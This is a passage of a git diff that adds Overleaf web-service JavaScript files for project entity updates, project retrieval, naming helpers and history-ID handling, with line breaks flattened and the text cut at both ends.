await ProjectEntityMongoUpdateHandler.promises.deleteEntity( + projectId, + entityId, + entityType, + userId + ) + const subtreeListing = await ProjectEntityUpdateHandler._cleanUpEntity( + projectBeforeDeletion, + newProject, + entity, + entityType, + path.fileSystem, + userId, + source + ) + + const subtreeEntityIds = subtreeListing.map(entry => + entry.entity._id.toString() + ) + await TpdsUpdateSender.promises.deleteEntity({ + projectId, + path: path.fileSystem, + projectName: projectBeforeDeletion.name, + entityId, + entityType, + subtreeEntityIds, + }) + + return entityId + } +) + +const deleteEntityWithPath = wrapWithLock( + async (projectId, path, userId, source) => { + const { element, type } = await ProjectLocator.promises.findElementByPath({ + project_id: projectId, + path, + exactCaseMatch: true, + }) + if (element == null) { + throw new Errors.NotFoundError('project not found') + } + return await ProjectEntityUpdateHandler.promises.deleteEntity.withoutLock( + projectId, + element._id, + type, + userId, + source + ) + } +) + +const mkdirp = wrapWithLock(async function (projectId, path, userId) { + for (const folder of path.split('/')) { + if (folder.length > 0 && !SafePath.isCleanFilename(folder)) { + throw new Errors.InvalidNameError('invalid element name') + } + } + return await ProjectEntityMongoUpdateHandler.promises.mkdirp( + projectId, + path, + userId, + { exactCaseMatch: false } + ) +}) + +const mkdirpWithExactCase = wrapWithLock( + async function (projectId, path, userId) { + for (const folder of path.split('/')) { + if (folder.length > 0 && !SafePath.isCleanFilename(folder)) { + throw new Errors.InvalidNameError('invalid element name') + } + } + return await ProjectEntityMongoUpdateHandler.promises.mkdirp( + projectId, + path, + userId, + { exactCaseMatch: true } + ) + } +) + +const addFolder = wrapWithLock( + async function (projectId, parentFolderId, folderName, userId) { + if (!SafePath.isCleanFilename(folderName)) { + throw new Errors.InvalidNameError('invalid element name') + } + return await ProjectEntityMongoUpdateHandler.promises.addFolder( + projectId, + parentFolderId, + folderName, + userId + ) + } +) + +const moveEntity = wrapWithLock( + async function ( + projectId, + entityId, + destFolderId, + entityType, + userId, + source + ) { + logger.debug( + { entityType, entityId, projectId, destFolderId }, + 'moving entity' + ) + if (entityType == null) { + logger.warn({ err: 'No entityType set', projectId, entityId }) + throw new Error('No entityType set') + } + entityType = entityType.toLowerCase() + await DocumentUpdaterHandler.promises.flushProjectToMongo(projectId) + const { project, startPath, endPath, rev, changes } = + await ProjectEntityMongoUpdateHandler.promises.moveEntity( + projectId, + entityId, + destFolderId, + entityType, + userId + ) + + const projectHistoryId = project.overleaf?.history?.id + try { + await TpdsUpdateSender.promises.moveEntity({ + projectId, + projectName: project.name, + startPath, + endPath, + rev, + entityId, + entityType, + folderId: destFolderId, + }) + } catch (err) { + logger.error({ err }, 'error sending tpds update') + } + + return await DocumentUpdaterHandler.promises.updateProjectStructure( + projectId, + projectHistoryId, + userId, + changes, + source + ) + } +) + +const renameEntity = wrapWithLock( + async function (projectId, entityId, entityType, newName, userId, source) { + if (!newName || typeof newName !== 'string') { + const err = new OError('invalid newName value', { + value: newName, + type: typeof newName, + projectId, + entityId, + entityType, + userId, + source, + }) + logger.error({ err }, 'Invalid newName passed to renameEntity') + throw err + } + if (!SafePath.isCleanFilename(newName)) { + throw new Errors.InvalidNameError('invalid element name') + } + logger.debug({ entityId, projectId }, `renaming ${entityType}`) + if (entityType == null) { + logger.warn({ err: 'No entityType set', projectId, entityId }) + throw new Error('No entityType set') + } + entityType = entityType.toLowerCase() + await DocumentUpdaterHandler.promises.flushProjectToMongo(projectId) + const { project, startPath, endPath, rev, changes } = + await ProjectEntityMongoUpdateHandler.promises.renameEntity( + projectId, + entityId, + entityType, + newName, + userId + ) + + const projectHistoryId = project.overleaf?.history?.id + try { + await TpdsUpdateSender.promises.moveEntity({ + projectId, + projectName: project.name, + startPath, + endPath, + rev, + entityId, + entityType, + folderId: null, // this means the folder has not changed + }) + } catch (err) { + logger.error({ err }, 'error sending tpds update') + } + return await DocumentUpdaterHandler.promises.updateProjectStructure( + projectId, + projectHistoryId, + userId, + changes, + source + ) + } +) + +// This doesn't directly update project structure, but we need to take the lock +// to prevent anything else being queued before the resync update +const resyncProjectHistory = wrapWithLock( + async (projectId, opts) => { + const project = await ProjectGetter.promises.getProject(projectId, { + rootFolder: true, + overleaf: true, + }) + const projectHistoryId = project.overleaf?.history?.id + if (projectHistoryId == null) { + throw new Errors.ProjectHistoryDisabledError( + `project history not enabled for ${projectId}` + ) + } + + const { docs, files, folders } = + ProjectEntityHandler.getAllEntitiesFromProject(project) + // _checkFileTree() must be passed the folders before docs and + // files + await ProjectEntityUpdateHandler._checkFiletree( + projectId, + projectHistoryId, + [...folders, ...docs, ...files] + ) + + await DocumentUpdaterHandler.promises.resyncProjectHistory( + projectId, + projectHistoryId, + docs, + files, + opts + ) + if (opts.historyRangesMigration) { + return await ProjectOptionsHandler.promises.setHistoryRangesSupport( + projectId, + opts.historyRangesMigration === 'forwards' + ) + } + }, + LockManager.withTimeout(6 * 60) // use an extended lock for the resync operations +) + +const convertDocToFile = wrapWithLock({ + async beforeLock(projectId, docId, userId, source) { + await DocumentUpdaterHandler.promises.flushDocToMongo(projectId, docId) + const { element: doc, path } = await ProjectLocator.promises.findElement({ + project_id: projectId, + element_id: docId, + type: 'doc', + }) + const docPath = path.fileSystem + const { lines, rev, ranges } = await DocstoreManager.promises.getDoc( + projectId, + docId + ) + if (!_.isEmpty(ranges)) { + throw new Errors.DocHasRangesError({}) + } + await DocumentUpdaterHandler.promises.deleteDoc(projectId, docId, false) + const fsPath = await FileWriter.promises.writeLinesToDisk(projectId, lines) + const { + url: fileStoreUrl, + fileRef, + createdBlob, + } = await FileStoreHandler.promises.uploadFileFromDisk( + projectId, + { name: doc.name, rev: rev + 1 }, + fsPath + ) + try { + await fs.promises.unlink(fsPath) + } catch (err) { + logger.warn({ err, path: fsPath }, 'failed to clean up temporary file') + } + return { + projectId, + doc, + path: docPath, + fileRef, + fileStoreUrl, + userId, + source, + createdBlob, + } + }, + async withLock({ + projectId, + doc, + path, + fileRef, + fileStoreUrl, + userId, + source, + createdBlob, + }) { + const project = + await ProjectEntityMongoUpdateHandler.promises.replaceDocWithFile( + projectId, + doc._id, + fileRef, + userId + ) + const projectHistoryId = project.overleaf?.history?.id + await DocumentUpdaterHandler.promises.updateProjectStructure( + projectId, + projectHistoryId, + userId, + { + oldDocs: [{ doc, path }], + newFiles: [{ file: fileRef, path, url: fileStoreUrl, createdBlob }], + newProject: project, + }, + source + ) + const { folder } = await ProjectLocator.promises.findElement({ + project_id: projectId, + element_id: fileRef._id, + type: 'file', + }) + EditorRealTimeController.emitToRoom( + projectId, + 'removeEntity', + doc._id, + 'convertDocToFile' + ) + EditorRealTimeController.emitToRoom( + projectId, + 'reciveNewFile', + folder._id, + fileRef, + 'convertDocToFile', + null, + userId + ) + return fileRef + }, +}) + +async function setMainBibliographyDoc(projectId, newBibliographyDocId) { + logger.debug( + { projectId, mainBibliographyDocId: newBibliographyDocId }, + 'setting main bibliography doc' + ) + if (projectId == null || newBibliographyDocId == null) { + throw new Errors.InvalidError('missing arguments (project or doc)') + } + const docPath = + await ProjectEntityHandler.promises.getDocPathByProjectIdAndDocId( + projectId, + newBibliographyDocId + ) + if (ProjectEntityUpdateHandler.isPathValidForMainBibliographyDoc(docPath)) { + await Project.updateOne( + { _id: projectId }, + { mainBibliographyDoc_id: newBibliographyDocId } + ).exec() + } else { + throw new Errors.UnsupportedFileTypeError( + 'invalid file extension for main bibliography doc' + ) + } +} + +const ProjectEntityUpdateHandler = { + LOCK_NAMESPACE, + + addDoc: callbackifyMultiResult(addDoc, ['doc', 'folderId']), + + addDocWithRanges: callbackifyMultiResult(addDocWithRanges, [ + 'doc', + 'folderId', + ]), + + addFile: callbackifyMultiResult(addFile, [ + 'fileRef', + 'folderId', + 'createdBlob', + ]), + + addFolder: callbackifyMultiResult(addFolder, ['folder', 'parentFolderId']), + + convertDocToFile: callbackify(convertDocToFile), + + deleteEntity: callbackify(deleteEntity), + + deleteEntityWithPath: callbackify(deleteEntityWithPath), + + mkdirp: callbackifyMultiResult(mkdirp, [ + 'newFolders', + 'folder', + 'parentFolder', + ]), + + mkdirpWithExactCase: callbackifyMultiResult(mkdirpWithExactCase, [ + 'newFolders', + 'folder', + 'parentFolder', + ]), + + moveEntity: callbackify(moveEntity), + + renameEntity: callbackify(renameEntity), + + resyncProjectHistory: callbackify(resyncProjectHistory), + + setRootDoc: callbackify(setRootDoc), + + unsetRootDoc: callbackify(unsetRootDoc), + + setMainBibliographyDoc: callbackify(setMainBibliographyDoc), + + updateDocLines: callbackify(updateDocLines), + + upsertDoc: callbackifyMultiResult(upsertDoc, ['doc', 'isNew']), + + appendToDoc: callbackify(appendToDoc), + + upsertDocWithPath: callbackifyMultiResult(upsertDocWithPath, [ + 'doc', + 'isNew', + 'newFolders', + 'folder', + ]), + + upsertFile: callbackifyMultiResult(upsertFile, [ + 'fileRef', + 'isNew', + 'oldFileRef', + ]), + + upsertFileWithPath: callbackifyMultiResult(upsertFileWithPath, [ + 'fileRef', + 'isNew', + 'oldFileRef', + 'newFolders', + 'folder', + ]), + + promises: { + addDoc, + addDocWithRanges, + addFile, + addFolder, + convertDocToFile, + deleteEntity, + deleteEntityWithPath, + mkdirp, + mkdirpWithExactCase, + moveEntity, + renameEntity, + resyncProjectHistory, + setRootDoc, + unsetRootDoc, + updateDocLines, + upsertDoc, + upsertDocWithPath, + upsertFile, + upsertFileWithPath, + appendToDocWithPath: appendToDoc, + }, + + async _addDocAndSendToTpds(projectId, folderId, doc, userId) { + let result, project + try { + ;({ result, project } = + await ProjectEntityMongoUpdateHandler.promises.addDoc( + projectId, + folderId, + doc, + userId + )) + } catch (err) { + throw OError.tag(err, 'error adding file with project', { + projectId, + folderId, + doc_name: doc != null ? doc.name : undefined, + doc_id: doc != null ? doc._id : undefined, + }) + } + + await TpdsUpdateSender.promises.addDoc({ + projectId, + docId: doc != null ? doc._id : undefined, + path: result?.path?.fileSystem, + projectName: project.name, + rev: 0, + folderId, + }) + return { result, project } + }, + + async _uploadFile(projectId, folderId, fileName, fsPath, linkedFileData) { + if (!SafePath.isCleanFilename(fileName)) { + throw new Errors.InvalidNameError('invalid element name') + } + const fileArgs = { + name: fileName, + linkedFileData, + } + try { + return await FileStoreHandler.promises.uploadFileFromDisk( + projectId, + fileArgs, + fsPath + ) + } catch (err) { + throw OError.tag(err, 'error uploading image to s3', { + projectId, + folderId, + file_name: fileName, + }) + } + }, + + async _addFileAndSendToTpds(projectId, folderId, fileRef, userId) { + let result, project + try { + ;({ result, project } = + await ProjectEntityMongoUpdateHandler.promises.addFile( + projectId, + folderId, + fileRef, + userId + )) + } catch (err) { + throw OError.tag(err, 'error adding file with project', { + projectId, + folderId, + file_name: fileRef.name, + fileRef, + }) + } + + const historyId = project?.overleaf?.history?.id + if (!historyId) { + throw new OError('project does not have a history id', { projectId }) + } + await TpdsUpdateSender.promises.addFile({ + projectId, + historyId, + fileId: fileRef._id, + hash: fileRef.hash, + path: result?.path?.fileSystem, + projectName: project.name, + rev: fileRef.rev, + folderId, + }) + return { result, project } + }, + + async _replaceFile( + projectId, + fileId, + userId, + newFileRef, + fileStoreUrl, + folderId, + source, + createdBlob + ) { + const { + oldFileRef, + project, + path, + newProject, + newFileRef: updatedFileRef, + } = await ProjectEntityMongoUpdateHandler.promises.replaceFileWithNew( + projectId, + fileId, + newFileRef, + userId + ) + + const oldFiles = [ + { + file: oldFileRef, + path: path.fileSystem, + }, + ] + const newFiles = [ + { + file: updatedFileRef, + createdBlob, + path: path.fileSystem, + url: fileStoreUrl, + }, + ] + const projectHistoryId = project.overleaf?.history?.id + await TpdsUpdateSender.promises.addFile({ + projectId: project._id, + historyId: projectHistoryId, + fileId: updatedFileRef._id, + hash: updatedFileRef.hash, + path: path.fileSystem, + rev: updatedFileRef.rev, + projectName: project.name, + folderId, + }) + + await DocumentUpdaterHandler.promises.updateProjectStructure( + projectId, + projectHistoryId, + userId, + { oldFiles, newFiles, newProject }, + source + ) + + return updatedFileRef + }, + + async _checkFiletree(projectId, projectHistoryId, entities) { + const adjustPathsAfterFolderRename = (oldPath, newPath) => { + oldPath = oldPath + '/' + newPath = newPath + '/' + for (const entity of entities) { + if (entity.path.startsWith(oldPath)) { + entity.path = newPath + entity.path.slice(oldPath.length) + } + } + } + + // Data structures for recording pending renames + const renames = [] + const paths = new Set() + for (const entity of entities) { + const originalName = entity.folder + ? entity.folder.name + : entity.doc + ? entity.doc.name + : entity.file.name + + let newPath = entity.path + let newName = originalName + + // Clean the filename if necessary + if (newName === '') { + newName = 'untitled' + } else { + newName = SafePath.clean(newName) + } + if (newName !== originalName) { + newPath = Path.join( + newPath.slice(0, newPath.length - originalName.length), + newName + ) + } + + // Check if we've seen that path already + if (paths.has(newPath)) { + newPath = ProjectEntityUpdateHandler.findNextAvailablePath( + paths, + newPath + ) + newName = newPath.split('/').pop() + } + + // If we've changed the filename, schedule a rename + if (newName !== originalName) { + renames.push({ entity, newName, newPath }) + if (entity.folder) { + // Here, we rely on entities being processed in the right order. + // Parent folders need to be processed before their children. This is + // the case only because getAllEntitiesFromProject() returns folders + // in that order and resyncProjectHistory() calls us with the folders + // first. + + adjustPathsAfterFolderRename(entity.path, newPath) + } + } + + // Remember that we've seen this path + paths.add(newPath) + } + + if (renames.length === 0) { + return + } + logger.warn( + { + projectId, + renames: renames.map(rename => ({ + oldPath: rename.entity.path, + newPath: rename.newPath, + })), + }, + 'found conflicts or bad filenames in filetree' + ) + + // Avoid conflicts by processing renames in the reverse order. If we have + // the following starting situation: + // + // somefile.tex + // somefile.tex + // somefile.tex (1) + // + // somefile.tex would be processed first, and then somefile.tex (1), + // yielding the following renames: + // + // somefile.tex -> somefile.tex (1) + // somefile.tex (1) -> somefile.tex (2) + // + // When the first rename was decided, we didn't know that somefile.tex (1) + // existed, so that created a conflict. By processing renames in the + // reverse order, we start with the files that had the most extensive + // information about existing files. + renames.reverse() + + for (const rename of renames) { + // rename the duplicate files + const entity = rename.entity + const entityId = entity.folder + ? entity.folder._id + : entity.doc + ? entity.doc._id + : entity.file._id + const entityType = entity.folder ? 'folder' : entity.doc ? 'doc' : 'file' + const { changes } = + await ProjectEntityMongoUpdateHandler.promises.renameEntity( + projectId, + entityId, + entityType, + rename.newName, + null // unset lastUpdatedBy + ) + + // update the renamed entity for the resync + entity.path = rename.newPath + if (entityType === 'folder') { + entity.folder.name = rename.newName + } else if (entityType === 'doc') { + entity.doc.name = rename.newName + } else { + entity.file.name = rename.newName + } + await DocumentUpdaterHandler.promises.updateProjectStructure( + projectId, + projectHistoryId, + null, + changes, + 'automatic-fix' + ) + } + }, + + findNextAvailablePath(allPaths, candidatePath) { + const incrementReplacer = (match, p1) => { + return ' (' + (parseInt(p1, 10) + 1) + ')' + } + // if the filename was invalid we should normalise it here too. Currently + // this only handles renames in the same folder, so we will be out of luck + // if it is the folder name which in invalid. We could handle folder + // renames by returning the folders list from getAllEntitiesFromProject + do { + // does the filename look like "foo (1)" if so, increment the number in parentheses + if (/ \(\d+\)$/.test(candidatePath)) { + candidatePath = candidatePath.replace(/ \((\d+)\)$/, incrementReplacer) + } else { + // otherwise, add a ' (1)' suffix to the name + candidatePath = candidatePath + ' (1)' + } + } while (allPaths.has(candidatePath)) // keep going until the name is unique + // add the new name to the set + allPaths.add(candidatePath) + return candidatePath + }, + + isPathValidForRootDoc(docPath) { + const docExtension = Path.extname(docPath) + return VALID_ROOT_DOC_REGEXP.test(docExtension) + }, + + isPathValidForMainBibliographyDoc(docPath) { + const docExtension = Path.extname(docPath).toLowerCase() + return docExtension === '.bib' + }, + + async _cleanUpEntity( + project, + newProject, + entity, + entityType, + path, + userId, + source + ) { + const subtreeListing = _listSubtree(entity, entityType, path) + await ProjectEntityUpdateHandler._updateProjectStructureWithDeletedEntity( + project, + newProject, + subtreeListing, + userId, + source + ) + + for (const entry of subtreeListing) { + if (entry.type === 'doc') { + await ProjectEntityUpdateHandler._cleanUpDoc( + project, + entry.entity, + entry.path, + userId + ) + } else if (entry.type === 'file') { + await ProjectEntityUpdateHandler._cleanUpFile(project, entry.entity) + } + } + return subtreeListing + }, + + async _updateProjectStructureWithDeletedEntity( + project, + newProject, + subtreeListing, + userId, + source + ) { + const changes = { oldDocs: [], oldFiles: [] } + for (const entry of subtreeListing) { + if (entry.type === 'doc') { + changes.oldDocs.push({ doc: entry.entity, path: entry.path }) + } else if (entry.type === 'file') { + changes.oldFiles.push({ file: entry.entity, path: entry.path }) + } + } + + // now send the project structure changes to the docupdater + changes.newProject = newProject + const projectId = project._id.toString() + const projectHistoryId = + project.overleaf && + project.overleaf.history && + project.overleaf.history.id + return await DocumentUpdaterHandler.promises.updateProjectStructure( + projectId, + projectHistoryId, + userId, + changes, + source + ) + }, + + async _cleanUpDoc(project, doc) { + const projectId = project._id.toString() + const docId = doc._id.toString() + if (project.rootDoc_id != null && project.rootDoc_id.toString() === docId) { + await ProjectEntityUpdateHandler.promises.unsetRootDoc(projectId) + } + + const { name } = doc + const deletedAt = new Date() + await DocstoreManager.promises.deleteDoc(projectId, docId, name, deletedAt) + + return await DocumentUpdaterHandler.promises.deleteDoc(projectId, docId) + }, + + async _cleanUpFile(project, file) { + return await ProjectEntityMongoUpdateHandler.promises._insertDeletedFileReference( + project._id, + file + ) + }, +} + +/** + * List all descendants of an entity along with their type and path. Include + * the top-level entity as well. + */ +function _listSubtree(entity, entityType, entityPath) { + if (entityType.indexOf('file') !== -1) { + return [{ type: 'file', entity, path: entityPath }] + } else if (entityType.indexOf('doc') !== -1) { + return [{ type: 'doc', entity, path: entityPath }] + } else if (entityType.indexOf('folder') !== -1) { + const listing = [] + const _recurseFolder = (folder, folderPath) => { + listing.push({ type: 'folder', entity: folder, path: folderPath }) + for (const doc of iterablePaths(folder, 'docs')) { + listing.push({ + type: 'doc', + entity: doc, + path: Path.join(folderPath, doc.name), + }) + } + for (const file of iterablePaths(folder, 'fileRefs')) { + listing.push({ + type: 'file', + entity: file, + path: Path.join(folderPath, file.name), + }) + } + for (const childFolder of iterablePaths(folder, 'folders')) { + _recurseFolder(childFolder, Path.join(folderPath, childFolder.name)) + } + } + _recurseFolder(entity, entityPath) + return listing + } else { + // This shouldn't happen, but if it does, fail silently. + return [] + } +} + +module.exports = ProjectEntityUpdateHandler diff --git a/services/web/app/src/Features/Project/ProjectGetter.js b/services/web/app/src/Features/Project/ProjectGetter.js new file mode 100644 index 0000000..7edf08d --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectGetter.js @@ -0,0 +1,160 @@ +const { db } = require('../../infrastructure/mongodb') +const { normalizeQuery } = require('../Helpers/Mongo') +const OError = require('@overleaf/o-error') +const { Project } = require('../../models/Project') +const LockManager = require('../../infrastructure/LockManager') +const { DeletedProject } = require('../../models/DeletedProject') +const { callbackifyAll } = require('@overleaf/promise-utils') + +const ProjectGetter = { + EXCLUDE_DEPTH: 8, + + async getProjectWithoutDocLines(projectId) { + const excludes = {} + for (let i = 1; i <= ProjectGetter.EXCLUDE_DEPTH; i++) { + excludes[`rootFolder${Array(i).join('.folders')}.docs.lines`] = 0 + } + return await ProjectGetter.getProject(projectId, excludes) + }, + + async getProjectWithOnlyFolders(projectId) { + const excludes = {} + for (let i = 1; i <= ProjectGetter.EXCLUDE_DEPTH; i++) { + excludes[`rootFolder${Array(i).join('.folders')}.docs`] = 0 + excludes[`rootFolder${Array(i).join('.folders')}.fileRefs`] = 0 + } + return await ProjectGetter.getProject(projectId, excludes) + }, + + async getProject(projectId, projection = {}) { + if (projectId == null) { + throw new Error('no project id provided') + } + if (typeof projection !== 'object') { + throw new Error('projection is not an object') + } + + if (projection.rootFolder || Object.keys(projection).length === 0) { + const ProjectEntityMongoUpdateHandler = require('./ProjectEntityMongoUpdateHandler') + return await LockManager.promises.runWithLock( + ProjectEntityMongoUpdateHandler.LOCK_NAMESPACE, + projectId, + () => ProjectGetter.getProjectWithoutLock(projectId, projection) + ) + } else { + return await ProjectGetter.getProjectWithoutLock(projectId, projection) + } + }, + + async getProjectWithoutLock(projectId, projection = {}) { + if (projectId == null) { + throw new Error('no project id provided') + } + if (typeof projection !== 'object') { + throw new Error('projection is not an object') + } + + const query = normalizeQuery(projectId) + + let project + try { + project = await db.projects.findOne(query, { projection }) + } catch (error) { + OError.tag(error, 'error getting project', { + query, + projection, + }) + throw error + } + + return project + }, + + async getProjectIdByReadAndWriteToken(token) { + const project = await Project.findOne( + { 'tokens.readAndWrite': token }, + { _id: 1 } + ).exec() + + if (project == null) { + return + } + + return project._id + }, + + async findAllUsersProjects(userId, fields) { + const CollaboratorsGetter = require('../Collaborators/CollaboratorsGetter') + const ownedProjects = await Project.find( + { owner_ref: userId }, + fields + ).exec() + + const projects = + await CollaboratorsGetter.promises.getProjectsUserIsMemberOf( + userId, + fields + ) + + const result = { + owned: ownedProjects || [], + readAndWrite: projects.readAndWrite || [], + readOnly: projects.readOnly || [], + tokenReadAndWrite: projects.tokenReadAndWrite || [], + tokenReadOnly: projects.tokenReadOnly || [], + review: projects.review || [], + } + + // Remove duplicate projects. The order of result values is determined by the order they occur. + const tempAddedProjectsIds = new Set() + const filteredProjects = Object.entries(result).reduce((prev, current) => { + const [key, projects] = current + + prev[key] = [] + + projects.forEach(project => { + const projectId = project._id.toString() + + if (!tempAddedProjectsIds.has(projectId)) { + prev[key].push(project) + tempAddedProjectsIds.add(projectId) + } + }) + + return prev + }, {}) + + return filteredProjects + }, + + /** + * Return all projects with the given name that belong to the given user. + * + * Projects include the user's own projects as well as collaborations with + * read/write access. + */ + async findUsersProjectsByName(userId, projectName) { + const allProjects = await ProjectGetter.findAllUsersProjects( + userId, + 'name archived trashed' + ) + + const { owned, readAndWrite } = allProjects + const projects = owned.concat(readAndWrite) + const lowerCasedProjectName = projectName.toLowerCase() + return projects.filter( + project => project.name.toLowerCase() === lowerCasedProjectName + ) + }, + + async getUsersDeletedProjects(userId) { + return await DeletedProject.find({ + 'deleterData.deletedProjectOwnerId': userId, + }).exec() + }, +} + +module.exports = { + ...callbackifyAll(ProjectGetter), + promises: ProjectGetter, +} diff --git a/services/web/app/src/Features/Project/ProjectHelper.js b/services/web/app/src/Features/Project/ProjectHelper.js new file mode 100644 index 0000000..dc64fbf --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectHelper.js @@ -0,0 +1,185 @@ +// ts-check +const { ObjectId } = require('mongodb-legacy') +const _ = require('lodash') +const { promisify } = require('util') +const Settings = require('@overleaf/settings') + +/** + * @import { MongoProject } from "./types" + */ + +const ENGINE_TO_COMPILER_MAP = { + latex_dvipdf: 'latex', + pdflatex: 'pdflatex', + xelatex: 'xelatex', + lualatex: 'lualatex', +} + +module.exports = { + compilerFromV1Engine, + isArchived, + isTrashed, + isArchivedOrTrashed, + calculateArchivedArray, + ensureNameIsUnique, + getAllowedImagesForUser, + promises: { + ensureNameIsUnique: promisify(ensureNameIsUnique), + }, +} + +function compilerFromV1Engine(engine) { + return ENGINE_TO_COMPILER_MAP[engine] +} + +/** + @param {MongoProject} project + @param {string} userId + * @returns {boolean} + */ +function isArchived(project, userId) { + userId = new ObjectId(userId) + + return (project.archived || []).some(id => id.equals(userId)) +} + +/** + * @param {MongoProject} project + * @param {string} userId + * @returns {boolean} + */ +function isTrashed(project, userId) { + userId = new ObjectId(userId) + + return (project.trashed || []).some(id => id.equals(userId)) +} + +/** + * @param {MongoProject} project + * @param {string} userId + * @returns {boolean} + */ +function isArchivedOrTrashed(project, userId) { + return isArchived(project, userId) || isTrashed(project, userId) +} + +function _allCollaborators(project) { + return _.unionWith( + [project.owner_ref], + project.collaberator_refs, + project.readOnly_refs, + project.tokenAccessReadAndWrite_refs, + project.tokenAccessReadOnly_refs, + _objectIdEquals + ) +} + +function calculateArchivedArray(project, userId, action) { + let archived = project.archived + userId = new ObjectId(userId) + + if (archived === true) { + archived = _allCollaborators(project) + } else if (!archived) { + archived = [] + } + + if (action === 'ARCHIVE') { + archived = _.unionWith(archived, [userId], _objectIdEquals) + } else if (action === 'UNARCHIVE') { + archived = archived.filter(id => !_objectIdEquals(id, userId)) + } else { + throw new Error('Unrecognised action') + } + + return archived +} + +function ensureNameIsUnique(nameList, name, suffixes, maxLength, callback) { + // create a set of all project names + if (suffixes == null) { + suffixes = [] + } + const allNames = new Set(nameList) + const isUnique = x => !allNames.has(x) + // check if the supplied name is already unique + if (isUnique(name)) { + return callback(null, name) + } + // the name already exists, try adding the user-supplied suffixes to generate a unique name + for (const suffix of suffixes) { + const candidateName = _addSuffixToProjectName(name, suffix, maxLength) + if (isUnique(candidateName)) { + return callback(null, candidateName) + } + } + // if there are no (more) suffixes, use a numeric one + const uniqueName = _addNumericSuffixToProjectName(name, allNames, maxLength) + if (uniqueName != null) { + callback(null, uniqueName) + } else { + callback(new Error(`Failed to generate a unique name for: ${name}`)) + } +} + +function _objectIdEquals(firstVal, secondVal) { + // For use as a comparator for unionWith + return firstVal.toString() === secondVal.toString() +} + +function _addSuffixToProjectName(name, suffix, maxLength) { + // append the suffix and truncate the project title if needed + if (suffix == null) { + suffix = '' + } + const truncatedLength = maxLength - suffix.length + return name.substr(0, truncatedLength) + suffix +} + +function _addNumericSuffixToProjectName(name, allProjectNames, maxLength) { + const NUMERIC_SUFFIX_MATCH = / \((\d+)\)$/ + const suffixedName = function (basename, number) { + const suffix = ` (${number})` + return basename.substr(0, maxLength - suffix.length) + suffix + } + + const match = name.match(NUMERIC_SUFFIX_MATCH) + let basename = name + let n = 1 + + if (match != null) { + basename = name.replace(NUMERIC_SUFFIX_MATCH, '') + n = parseInt(match[1]) + } + + const prefixMatcher = new RegExp(`^${_.escapeRegExp(basename)} \\(\\d+\\)$`) + + const projectNamesWithSamePrefix = Array.from(allProjectNames).filter(name => + prefixMatcher.test(name) + ) + const last = allProjectNames.size + n + const nIsLikelyAYear = n > 1000 && projectNamesWithSamePrefix.length < n / 2 + if (nIsLikelyAYear) { + basename = name + n = 1 + } + + while (n <= last) { + const candidate = suffixedName(basename, n) + if (!allProjectNames.has(candidate)) { + return candidate + } + n += 1 + } + + return null +} + +function getAllowedImagesForUser(user) { + const images = Settings.allowedImageNames || [] + if (user?.alphaProgram) { + return images + } else { + return images.filter(image => !image.alphaOnly) + } +} diff --git a/services/web/app/src/Features/Project/ProjectHistoryHandler.js b/services/web/app/src/Features/Project/ProjectHistoryHandler.js new file mode 100644 index 0000000..5ba3ee9 --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectHistoryHandler.js @@ -0,0 +1,65 @@ +const { Project } = require('../../models/Project') +const ProjectDetailsHandler = require('./ProjectDetailsHandler') +const HistoryManager = require('../History/HistoryManager') +const ProjectEntityUpdateHandler = require('./ProjectEntityUpdateHandler') +const { callbackify } = require('util') + +const ProjectHistoryHandler = { + async setHistoryId(projectId, historyId) { + // reject invalid history ids + if (historyId == null) { + throw new Error('missing history id') + } + + // use $exists:false to prevent overwriting any existing history id, atomically + const result = await Project.updateOne( + { _id: projectId, 'overleaf.history.id': { $exists: false } }, + { 'overleaf.history.id': historyId } + ) + + if (result.matchedCount === 0) { + throw new Error('history exists') + } + }, + + async getHistoryId(projectId) { + const project = await ProjectDetailsHandler.promises.getDetails(projectId) + return project?.overleaf?.history?.id + }, + + async ensureHistoryExistsForProject(projectId) { + // We can only set a history id for a project that doesn't have one. The + // history id is cached in the project history service, and changing an + // existing value corrupts the history, leaving it in an irrecoverable + // state. Setting a history id when one wasn't present before is ok, + // because undefined history ids aren't cached. + let historyId = await ProjectHistoryHandler.getHistoryId(projectId) + + if (historyId != null) { + return + } + + historyId = await HistoryManager.promises.initializeProject(projectId) + if (historyId == null) { + throw new Error('failed to initialize history id') + } + + await ProjectHistoryHandler.setHistoryId(projectId, historyId) + + await ProjectEntityUpdateHandler.promises.resyncProjectHistory( + projectId, + {} + ) + + await HistoryManager.promises.flushProject(projectId) + }, +} + +module.exports = { + setHistoryId: callbackify(ProjectHistoryHandler.setHistoryId), + getHistoryId: callbackify(ProjectHistoryHandler.getHistoryId), + ensureHistoryExistsForProject: callbackify( + ProjectHistoryHandler.ensureHistoryExistsForProject + ), + promises: ProjectHistoryHandler, +} diff --git a/services/web/app/src/Features/Project/ProjectListController.mjs b/services/web/app/src/Features/Project/ProjectListController.mjs new file mode 100644 index 0000000..88541ee --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectListController.mjs @@ -0,0 +1,750 @@ +// ts-check +import _ from 'lodash' + +import Metrics from '@overleaf/metrics' +import Settings from '@overleaf/settings' +import ProjectHelper from './ProjectHelper.js' +import ProjectGetter from './ProjectGetter.js' +import PrivilegeLevels from '../Authorization/PrivilegeLevels.js' +import SessionManager from '../Authentication/SessionManager.js' +import Sources from '../Authorization/Sources.js' +import UserGetter from '../User/UserGetter.js' +import SurveyHandler from '../Survey/SurveyHandler.mjs' +import TagsHandler from '../Tags/TagsHandler.js' +import { expressify } from '@overleaf/promise-utils' +import logger from '@overleaf/logger' +import Features from '../../infrastructure/Features.js' +import SubscriptionViewModelBuilder from '../Subscription/SubscriptionViewModelBuilder.js' +import NotificationsHandler from '../Notifications/NotificationsHandler.js' +import Modules from '../../infrastructure/Modules.js' +import { OError, V1ConnectionError } from '../Errors/Errors.js' +import { User } from '../../models/User.js' +import UserPrimaryEmailCheckHandler from '../User/UserPrimaryEmailCheckHandler.js' +import UserController from '../User/UserController.js' +import LimitationsManager from '../Subscription/LimitationsManager.js' +import NotificationsBuilder from '../Notifications/NotificationsBuilder.js' +import GeoIpLookup from '../../infrastructure/GeoIpLookup.js' +import SplitTestHandler from '../SplitTests/SplitTestHandler.js' +import SplitTestSessionHandler from '../SplitTests/SplitTestSessionHandler.js' +import SubscriptionLocator from '../Subscription/SubscriptionLocator.js' +import TutorialHandler from '../Tutorial/TutorialHandler.js' + +/** + * @import { 